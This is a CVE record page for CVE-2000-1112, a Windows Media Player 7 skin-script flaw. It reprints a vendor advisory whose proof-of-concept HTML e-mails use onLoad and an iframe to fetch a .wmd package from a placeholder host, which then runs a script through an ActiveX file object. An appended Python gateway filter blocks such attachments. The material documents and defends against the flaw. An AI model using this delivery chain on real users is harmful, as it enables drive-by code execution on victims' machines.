CVE-2000-1112: Details

CVE-2000-1112

1.56% V3
Local
2001-01-22 04h00 +00:00
2005-11-02 09h00 +00:00

CVE Description

Microsoft Windows Media Player 7 executes scripts in custom skin (.WMS) files, which could allow remote attackers to gain privileges via a skin that contains a malicious script, aka the ".WMS Script Execution" vulnerability.

CVE Information

Metrics

Metric  Score  Severity  CVSS Vector  Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore serves to compare a CVE's EPSS score against those of other CVEs.

Exploit Information

Exploit Database EDB-ID: 20424

Publication date: 2000-11-21 23h00 +00:00
Author: Sandro Gauci
EDB Verified: Yes

----[Title: [ GFISEC23112000 ] Microsoft Media Player 7 allows execution of Arbitrary Code
----[Published: 23.NOV.2000
----[Vendor Status: Microsoft has been informed and we have worked with them to release a patch.
----[Systems Affected: Windows ME (WMP7 is installed by default) and 95, 98, NT and 2000, using:
* Windows Media Player 7 and
* Internet Explorer 3+,
* Outlook Express 2000,
* Outlook Express 98,
* Outlook 2000,
* Outlook 98
* possibly all other HTML and/or javascript enabled e-mail clients.
----[The problem:
GFI, developer of email content checking & network security software, has recently discovered a security flaw within Windows Media Player which allows a malicious user to run arbitrary code on a target machine as it attempts to view a website or an HTML E-mail. The problem is exploited by embedding a javascript (.js) file within a Media Player skin file (.wmz) which can also be embedded in a Windows Media Download file (.wmd). This does not require the user to run any attachments since the Media Player file is automatically executed using an iframe tag or a window.open() within a <script> tag.
----[Proof of concept Exploit:
<Embedded within an HTML file or e-mail>
E-mail Example 1.
<head>
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
  alert('This exploit will now open a new window\n and automatically download the wmd file\n and execute it. This will create a file named\n gfiseclab.txt in your C:\\');
  window.open(theURL,winName,features);
}
//-->
</script>
</head>
<body bgcolor="#FFFFFF" onLoad="MM_openBrWindow('http://website/test.wmd','','width=0,height=0')">
</Embedded within an HTML e-mail>
E-mail Example 2.
<html>
<body>
<script>
alert('This exploit will now open a new window \n and automatically download the wmd file \n and execute it. This will create a file named \n gfiseclab.txt in your C:\\')
</script>
<iframe src="http://website/test.wmd"></iframe>
</body>
</html>
-------------------------------------
test.wmd is a compressed zip file which contains the following files:
* test.asx: meta file which points to an mpg file and the exploit skin file
* test.mpg: an example mpeg movie.
* test.wmz: the exploit skin file.
test.wmz is also a compressed zip file containing:
* test.js: our javascript which contains the following code
************************************
var fso, f1;
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
function onload(){
  playAgain();
}
************************************
* test.wms: another metafile which calls test.js
-------------------------------------
----[Solution:
For e-mail the best solution is to apply filtering on incoming e-mails via the SMTP server to filter WMD and WMZ files, disable javascript iframe tags, meta refresh tags and possibly ActiveX tags. This means that users should not worry about receiving malicious email and spreading worms etc. Consider unregistering .wmd and .wmz from being associated with Media Player 7 until a vendor patch is applied.
Procedure: In Windows Explorer click on View>Options>File Types and delete the following entries:
* Windows Media Player Skin Package.
* Windows Media Player Download Package.
This should provide some better protection.
----[Reference:
http://www.gfi.com/press/memp7exploitpr.htm
http://www.microsoft.com/technet/security/bulletin/MS00-090.asp
----[Contact Information:
Sandro Gauci
GFI Security Lab
sandro@xxxxxxx
http://www.gfi.com

source: https://www.securityfocus.com/bid/1976/info

Windows Media Player is an application used for viewing digital audio and video content. It is possible for a user running Windows Media Player 7 to enable a skin (.wms) file and unknowingly execute an embedded malicious script.

When a user attempts to retrieve a skin (.wms) file it is downloaded and resides on the user's local machine. If Windows Media Player is run with the malicious skin enabled, the ActiveX component would allow any arbitrary action to be achieved. Depending on Internet security settings this vulnerability is also exploitable if the skin file in question resides on a web site: the script could launch automatically when a user visits the web site. Execution of arbitrary scripts could make it possible for the malicious host to gain rights equivalent to those of the current user.
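As an added illustration of the advisory's Solution section (this is not GFI's code nor part of the CVE record): a mail-gateway check that treats .wmd and .wmz packages as the zip archives the advisory describes, recurses into a skin nested inside a download package, and flags .wms/.js members so the attachment can be dropped even when renamed. The sample package, its file names and the policy function are constructed here for the example.

```python
import io
import zipfile

# Package types named in the advisory: skins (.wmz) and download packages (.wmd)
# are zip archives; the .wms metafile and .js members inside them carry the script.
CONTAINER_EXTS = (".wmz", ".wmd")
SCRIPT_EXTS = (".js", ".wms")


def find_script_members(data, prefix=""):
    """Return paths of script-bearing members inside a .wmz/.wmd blob,
    recursing into nested containers (a .wmz packed inside a .wmd)."""
    hits = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return hits  # not a zip archive: nothing to inspect
    for info in archive.infolist():
        path = prefix + info.filename
        lower = info.filename.lower()
        if lower.endswith(SCRIPT_EXTS):
            hits.append(path)
        elif lower.endswith(CONTAINER_EXTS):
            hits.extend(find_script_members(archive.read(info), path + "/"))
    return hits


def should_block_attachment(filename, data):
    """Gateway policy from the advisory's Solution section: drop the attachment
    if its name is a WMD/WMZ/WMS/JS file, or if it is a renamed package whose
    contents still carry a skin script."""
    if filename.lower().endswith(CONTAINER_EXTS + SCRIPT_EXTS):
        return True
    return bool(find_script_members(data))


def build_sample_wmd():
    """Constructed stand-in for the advisory's test.wmd layout: test.asx, test.mpg
    and a nested test.wmz holding test.wms and test.js (placeholders, no payload)."""
    skin = io.BytesIO()
    with zipfile.ZipFile(skin, "w") as z:
        z.writestr("test.wms", "<!-- constructed skin metafile -->")
        z.writestr("test.js", "// constructed placeholder")
    pkg = io.BytesIO()
    with zipfile.ZipFile(pkg, "w") as z:
        z.writestr("test.asx", "<asx version='3.0'></asx>")
        z.writestr("test.mpg", b"\x00" * 16)
        z.writestr("test.wmz", skin.getvalue())
    return pkg.getvalue()
```

Inspecting contents rather than trusting the extension matters because the package is plain zip data and would otherwise pass a name-only filter once renamed.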

Products Mentioned

Configuration 0

Microsoft>>Windows_media_player >> Version 6.4

Microsoft>>Windows_media_player >> Version 7

References

http://www.securityfocus.com/bid/1976
Tags: vdb-entry, x_refsource_BID